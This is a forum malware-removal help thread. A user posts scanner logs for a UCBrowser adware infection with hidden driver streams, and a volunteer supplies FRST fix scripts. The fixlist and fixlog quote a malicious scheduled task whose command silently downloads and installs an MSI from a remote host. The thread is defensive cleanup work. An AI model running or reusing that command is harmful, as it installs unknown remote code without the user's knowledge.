Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with tenacious PUPs and self-installing Adware


  • Please log in to reply
12 replies to this topic

#1 Pfoertner

Pfoertner

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 11 February 2017 - 03:11 PM

Hello Community. My Name is Vinc and I have the following problem: A friend told me about a certain software and sent me a link - I trusted this connection, put out my windows defender and security system, and then: Got overran by malicious stuff.

 

I could manage to get rid off most of the stuff, but according to a couple of anti malware programs (Roguekiller, Adwcleaner and Emisoftemergency) there is still malware left. They sometimes show me more, sometimes less infections. Those programs find the malware and tell me they deleted it - but next time it's still there.

 

Malwarebytes ADWcleaner detects: ucdrv

Roguekiller detects: (log under the post)

 

My Firefox browser is for sure infected - Adblock doesn't work anymore, even after refreshing the browser and reinstalling the plug-ins. The other failure: From time to time there's a small windows command window opening for a very, very short moment. I can just put a glimpse on it before it disappears. I have no other visible disfunctions, but I am kind of afraid of those intruders on my computer - before I got the help from the anit malware programs the whole thing was a big mess (Malwarebytes found 600 malicious files when I ran it first). Had lots of chinese stuff on my desktop and like 342908 pop ups.

 

And mostly important: Thank you for doing this great job and helping people. Super cool thing to do :)

 

The FRST logs are attached.

 

Best regards!

 

Vinc

 

 

 

Rogue Killer report:

 

RogueKiller V12.9.7.0 (x64) [Feb  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : V [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 02/11/2017 20:49:46 (Duration : 00:17:04)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 2 ¤¤¤
[PUP.UCBrowser|PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser|PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:ucdrv-x64.sys -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x64 -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x86 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000LPVX-22V0TT0 +++++
--- User ---
[MBR] 4eaacede25066640e40b29d585bf222d
[BSP] f7a5b76647b7a5158f52a1a0f7595333 : Empty|VT.Unknown MBR Code
Partition table:
0 - Basic data partition | Offset (sectors): 2048 | Size: 460671 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 943456256 | Size: 16268 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: KINGSTON RBU-SNS8100S3128GD +++++
--- User ---
[MBR] ef8fc15c7eb6f25c0c92034fd9a47d63
[BSP] 7118f6b1701ab3bcdaa1d24c05e1abfa : Empty|VT.Unknown MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 600 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 1230848 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 128 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 121275 MB
User = LL1 ... OK
User = LL2 ... OK

 

Attached Files



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,578 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:37 AM

Posted 12 February 2017 - 10:43 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

ShellExecuteHooks: Kein Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} -  -> Keine Datei
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\V\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
S2 Numicultthges; C:\Program Files (x86)\Grihersmiritain\BbyManager.dll [X]
R1 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ACHTUNG
S3 ALSysIO; \??\C:\Users\V\AppData\Local\Temp\ALSysIO64.sys [X] <==== ACHTUNG
Task: {BF875A08-49D5-4DC9-A86A-F0742383D7F8} - System32\Tasks\Jernury => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-22V0TT0_WD-WXL1E54FMAU2FMAU2&amp;v=201729 /q
AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
AlternateDataStreams: C:\Windows\system32\drivers:x64 [371912]
AlternateDataStreams: C:\Windows\system32\drivers:x86 [1213218]

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please execute the RogueKiller tool and delete everthing that will be found.
Also if Malwarebytes finds anything remove all.
===

Firefox:
Reset Default Browsing settings:
https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-problems?utm_expid=65912487-41.djHNRQY0RhaLvvtvcd0BQA.2&utm_referrer=https%3A%2F%2Fwww.google.ca%2F

Clean the Firefox Cache.
https://kb.iu.edu/d/ahic#firefox
<<<>>>

Please let me know what problem persists with this computer.

#3 Pfoertner

Pfoertner
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 12 February 2017 - 04:06 PM

Adwarecleaner LOG:
 
# AdwCleaner v6.043 - Logfile created 12/02/2017 at 22:02:22
# Updated on 27/01/2017 by Malwarebytes
# Database : 2017-02-12.1 [Server]
# Operating System : Windows 8.1  (X64)
# Username : V - LÄPPES
# Running from : C:\Users\V\Downloads\adwcleaner_6.043.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

[-] Service deleted: ucdrv


***** [ Folders ] *****



***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****



***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [16492 Bytes] - [09/02/2017 21:09:41]
C:\AdwCleaner\AdwCleaner[C10].txt - [2786 Bytes] - [12/02/2017 20:55:24]
C:\AdwCleaner\AdwCleaner[C11].txt - [915 Bytes] - [12/02/2017 22:02:22]
C:\AdwCleaner\AdwCleaner[C2].txt - [1246 Bytes] - [09/02/2017 21:16:33]
C:\AdwCleaner\AdwCleaner[C3].txt - [1363 Bytes] - [09/02/2017 21:22:51]
C:\AdwCleaner\AdwCleaner[C4].txt - [1539 Bytes] - [09/02/2017 21:30:42]
C:\AdwCleaner\AdwCleaner[C5].txt - [2436 Bytes] - [09/02/2017 21:59:19]
C:\AdwCleaner\AdwCleaner[C6].txt - [2684 Bytes] - [09/02/2017 22:50:54]
C:\AdwCleaner\AdwCleaner[C7].txt - [2066 Bytes] - [10/02/2017 00:54:40]
C:\AdwCleaner\AdwCleaner[C8].txt - [2252 Bytes] - [10/02/2017 11:14:29]
C:\AdwCleaner\AdwCleaner[C9].txt - [2723 Bytes] - [10/02/2017 21:00:23]
C:\AdwCleaner\AdwCleaner[S0].txt - [15083 Bytes] - [09/02/2017 21:08:52]
C:\AdwCleaner\AdwCleaner[S10].txt - [3143 Bytes] - [10/02/2017 20:59:54]
C:\AdwCleaner\AdwCleaner[S11].txt - [2935 Bytes] - [10/02/2017 21:56:58]
C:\AdwCleaner\AdwCleaner[S12].txt - [3009 Bytes] - [11/02/2017 20:52:20]
C:\AdwCleaner\AdwCleaner[S13].txt - [3083 Bytes] - [11/02/2017 21:03:44]
C:\AdwCleaner\AdwCleaner[S14].txt - [2985 Bytes] - [11/02/2017 21:07:54]
C:\AdwCleaner\AdwCleaner[S15].txt - [3059 Bytes] - [12/02/2017 18:03:36]
C:\AdwCleaner\AdwCleaner[S16].txt - [3033 Bytes] - [12/02/2017 22:02:07]
C:\AdwCleaner\AdwCleaner[S1].txt - [1499 Bytes] - [09/02/2017 21:16:10]
C:\AdwCleaner\AdwCleaner[S2].txt - [1659 Bytes] - [09/02/2017 21:22:33]
C:\AdwCleaner\AdwCleaner[S3].txt - [1791 Bytes] - [09/02/2017 21:29:32]
C:\AdwCleaner\AdwCleaner[S4].txt - [2787 Bytes] - [09/02/2017 21:50:49]
C:\AdwCleaner\AdwCleaner[S5].txt - [2879 Bytes] - [09/02/2017 22:05:45]
C:\AdwCleaner\AdwCleaner[S6].txt - [2992 Bytes] - [09/02/2017 22:50:42]
C:\AdwCleaner\AdwCleaner[S7].txt - [2321 Bytes] - [10/02/2017 00:54:21]
C:\AdwCleaner\AdwCleaner[S8].txt - [2394 Bytes] - [10/02/2017 11:13:32]
C:\AdwCleaner\AdwCleaner[S9].txt - [2540 Bytes] - [10/02/2017 11:22:37]

########## EOF - C:\AdwCleaner\AdwCleaner[C11].txt - [2821 Bytes] ##########
 
 
FRST FIXLOG

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von V (12-02-2017 21:39:37) Run:1
Gestartet von C:\Users\V\Desktop\first
Geladene Profile: V (Verfügbare Profile: V)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

ShellExecuteHooks: Kein Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} -  -> Keine Datei
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\V\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
S2 Numicultthges; C:\Program Files (x86)\Grihersmiritain\BbyManager.dll [X]
R1 ucdrv; C:\Windows\System32\drivers:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ACHTUNG
S3 ALSysIO; \??\C:\Users\V\AppData\Local\Temp\ALSysIO64.sys [X] <==== ACHTUNG
Task: {BF875A08-49D5-4DC9-A86A-F0742383D7F8} - System32\Tasks\Jernury => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-22V0TT0_WD-WXL1E54FMAU2FMAU2&amp;v=201729 /q
AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
AlternateDataStreams: C:\Windows\system32\drivers:x64 [371912]
AlternateDataStreams: C:\Windows\system32\drivers:x86 [1213218]

End
*****************

Wiederherstellungspunkt wurde erfolgreich erstellt.
Prozesse erfolgreich geschlossen.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => Wert erfolgreich entfernt
HKCR\CLSID\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => Schlüssel nicht gefunden.
C:\Users\V\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\Numicultthges => Schlüssel erfolgreich entfernt
Numicultthges => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\ucdrv => Schlüssel erfolgreich entfernt
ucdrv => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\ALSysIO => Schlüssel erfolgreich entfernt
ALSysIO => Dienst erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BF875A08-49D5-4DC9-A86A-F0742383D7F8} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BF875A08-49D5-4DC9-A86A-F0742383D7F8} => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\Jernury => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Jernury => Schlüssel erfolgreich entfernt
C:\Windows\system32\drivers => ":ucdrv-x64.sys" ADS konnte nicht entfernt werden.
C:\Windows\system32\drivers => ":x64" ADS konnte nicht entfernt werden.
C:\Windows\system32\drivers => ":x86" ADS konnte nicht entfernt werden.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15202523 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 26928345 B
Edge => 0 B
Chrome => 103424 B
Firefox => 390297386 B
Opera => 3401440 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 405058 B
NetworkService => 163608 B
V => 11633500 B

RecycleBin => 161211437 B
EmptyTemp: => 589.1 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 21:39:55 ====



#4 nasdaq

nasdaq

  • Malware Response Team
  • 39,578 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:37 AM

Posted 13 February 2017 - 08:17 AM

Please let me know what problem persists with this computer.

#5 Pfoertner

Pfoertner
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 14 February 2017 - 10:31 AM

Hello nasdaq!

 

RogueKiller still fins adware. Here are the logfiles!

 

RogueKiller V12.9.7.0 (x64) [Feb  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : V [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 02/14/2017 16:07:27 (Duration : 00:14:49)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 3 ¤¤¤
[PUP.UCBrowser|PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser|PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | ucdrv_repair : "C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe" --repair [x] -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:ucdrv-x64.sys -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x64 -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x86 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000LPVX-22V0TT0 +++++
--- User ---
[MBR] 4eaacede25066640e40b29d585bf222d
[BSP] f7a5b76647b7a5158f52a1a0f7595333 : Empty MBR Code
Partition table:
0 - Basic data partition | Offset (sectors): 2048 | Size: 460671 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 943456256 | Size: 16268 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: KINGSTON RBU-SNS8100S3128GD +++++
--- User ---
[MBR] ef8fc15c7eb6f25c0c92034fd9a47d63
[BSP] 7118f6b1701ab3bcdaa1d24c05e1abfa : Empty MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 600 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 1230848 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 128 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 121275 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: Intenso Speed Line USB Device +++++
--- User ---
[MBR] 3790524b1efbf2b8d3231f58edf75294
[BSP] 33f57e43fc374c847ac869b9340e0664 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 128 | Size: 15236 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] Die Anforderung wird nicht unterstützt. )
 



#6 nasdaq

nasdaq

  • Malware Response Team
  • 39,578 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:37 AM

Posted 14 February 2017 - 10:37 AM

Run the tool again and remove everything.


Let me know what problem persists.

#7 Pfoertner

Pfoertner
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 14 February 2017 - 11:36 AM

After restarting and running the tool again - same stuff found

 

RogueKiller Logs:

 

RogueKiller V12.9.7.0 (x64) [Feb  6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : V [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 02/14/2017 17:01:58 (Duration : 00:14:27)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 2 ¤¤¤
[PUP.UCBrowser|PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found
[PUP.UCBrowser|PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\UCBrowser -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:ucdrv-x64.sys -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x64 -> Found
[Ads.Generic|Hidden.ADS][Stream] C:\Windows\System32\drivers:x86 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000LPVX-22V0TT0 +++++
--- User ---
[MBR] 4eaacede25066640e40b29d585bf222d
[BSP] f7a5b76647b7a5158f52a1a0f7595333 : Empty MBR Code
Partition table:
0 - Basic data partition | Offset (sectors): 2048 | Size: 460671 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 943456256 | Size: 16268 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: KINGSTON RBU-SNS8100S3128GD +++++
--- User ---
[MBR] ef8fc15c7eb6f25c0c92034fd9a47d63
[BSP] 7118f6b1701ab3bcdaa1d24c05e1abfa : Empty MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 600 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 1230848 | Size: 100 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 128 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 121275 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: Intenso Speed Line USB Device +++++
--- User ---
[MBR] 3790524b1efbf2b8d3231f58edf75294
[BSP] 33f57e43fc374c847ac869b9340e0664 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 128 | Size: 15236 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] Die Anforderung wird nicht unterstützt. )
 



#8 nasdaq

nasdaq

  • Malware Response Team
  • 39,578 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:07:37 AM

Posted 14 February 2017 - 02:00 PM

Download and run this tool.
SystemLook_x64.exe
  • Double-click SystemLook.exe/SystemLook_x64.exe
  • to run it.
  • Copy and paste the content of the following bold text into the main textfield:
  • :regfind
    UCBrowser
    ucdrv_repair
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.
  • ===


#9 Pfoertner

Pfoertner
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:12:37 PM

Posted 14 February 2017 - 02:04 PM

I deleted the malware again with RogueKiller. Did the scan afterwards.

 

Here are the logs!

 

Thank you for your help!!!

 

SystemLook 30.07.11 by jpshortstuff
Log created at 20:02 on 14/02/2017 by V
Administrator - Elevation successful

========== regfind ==========

Searching for "UCBrowser"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\17e18612_0]
@="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0283&subsys_1025091b&rev_1000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\singlelineouttopo/00010001|\Device\HarddiskVolume6\Program Files (x86)\UCBrowser\Application\UCBrowser.exe%b{00000000-0000-0000-0000-000000000000}"
[HKEY_CURRENT_USER\Software\UCBrowser]
[HKEY_CURRENT_USER\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_CURRENT_USER\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_CURRENT_USER\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser]
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\Capabilities]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\Capabilities\Startmenu]
"StartMenuInternet"="UCBrowser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ReinstallCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"HideIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ShowIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe""
[HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications]
"UCBrowser"="Software\Clients\StartMenuInternet\UCBrowser\Capabilities"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\MediaPlayer\ShimInclusionList\UCBrowser.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\Capabilities]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\Capabilities\Startmenu]
"StartMenuInternet"="UCBrowser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ReinstallCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"HideIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\InstallInfo]
"ShowIconsCommand"=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe""
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RegisteredApplications]
"UCBrowser"="Software\Clients\StartMenuInternet\UCBrowser\Capabilities"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ucdrv]
"RepairCommand"=""C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe" --repair"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ucdrv]
"RepairCommand"=""C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe" --repair"
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\http\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\http\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\https\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\https\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,1"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.CRX\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,4"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.CRX\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.MHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.MHT\shell\open\command]
